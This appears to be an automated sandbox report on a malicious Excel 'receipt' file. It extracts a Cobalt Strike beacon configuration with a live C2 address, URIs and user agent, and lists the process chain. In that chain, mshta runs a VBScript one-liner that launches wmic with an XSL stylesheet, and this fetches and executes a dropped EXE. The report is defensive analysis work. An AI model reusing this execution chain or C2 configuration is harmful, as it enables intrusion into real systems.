Analysis

  • max time kernel
    1199s
  • max time network
    1222s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    06-07-2021 16:57

General

  • Target

    Reciept 0085830.xlsb

  • Size

    66KB

  • MD5

    c311de66dc44401313f4f68773b4c1dc

  • SHA1

    3eacc0d27518ceddf2268ed968bb2e2374bd4253

  • SHA256

    ef6d8a62c96a0fc27147b5d0116ec80c255634aa4d0379a96020afc6258731bf

  • SHA512

    79c2ac6fb759bb89c4a70138a495f92b82efbd61c05fc9ef186807615647320612057482385dab99c492e62f8c437d68d49a5ed2136eb338acb88447e77fb96c

Malware Config

Extracted

Family

cobaltstrike

Botnet

1359593325

C2

http://94.198.40.11:80/visit.js

Attributes
  • access_type

    512

  • host

    94.198.40.11,/visit.js

  • http_header1

    AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • polling_time

    60000

  • port_number

    80

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    4096

  • unknown2

    AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /submit.php

  • user_agent

    Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

  • watermark

    1359593325

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

  • CryptOne packer 1 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0085830.xlsb"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1728
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {50B946E6-C2A4-46B5-AEE7-7D2C1E97B544} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Windows\system32\mshta.EXE
      C:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qOLEDBQuery.xsl"" & Chr(34)),0:close")
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qOLEDBQuery.xsl"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\Temp\68w43.exe
          "C:\Windows\Temp\68w43.exe"
          4⤵
          • Executes dropped EXE
          PID:1640

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\qOLEDBQuery.xsl
    MD5

    406f4c54f22f973d09c6b2af9e220622

    SHA1

    f11ea0a6427f20028ebb1882adeae1d8359fbcd3

    SHA256

    c8a27b11d7765c96f0e8c16df06d9fa8dd9485b6d588f552d71b8e9b703e0280

    SHA512

    6825a2cdb52b6cdedd5d80e4eebb0f756a2f56704f514159b3637ccfa8ed3a1ed3db9f2fa75809f94d1c4ba4faddb941c8fcd13e87f59535b72363898b29c6de

  • C:\Windows\Temp\68w43.exe
    MD5

    9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

    SHA1

    d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

    SHA256

    b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

    SHA512

    c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

  • memory/1640-69-0x0000000075971000-0x0000000075973000-memory.dmp
    Filesize

    8KB

  • memory/1640-67-0x0000000000000000-mapping.dmp
  • memory/1640-70-0x0000000000220000-0x0000000000267000-memory.dmp
    Filesize

    284KB

  • memory/1640-71-0x0000000000400000-0x0000000000453000-memory.dmp
    Filesize

    332KB

  • memory/1640-72-0x00000000002A0000-0x00000000002D3000-memory.dmp
    Filesize

    204KB

  • memory/1640-73-0x0000000000460000-0x000000000049D000-memory.dmp
    Filesize

    244KB

  • memory/1664-63-0x0000000000000000-mapping.dmp
  • memory/1664-64-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp
    Filesize

    8KB

  • memory/1728-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1728-61-0x00000000716F1000-0x00000000716F3000-memory.dmp
    Filesize

    8KB

  • memory/1728-60-0x000000002F091000-0x000000002F094000-memory.dmp
    Filesize

    12KB

  • memory/1888-65-0x0000000000000000-mapping.dmp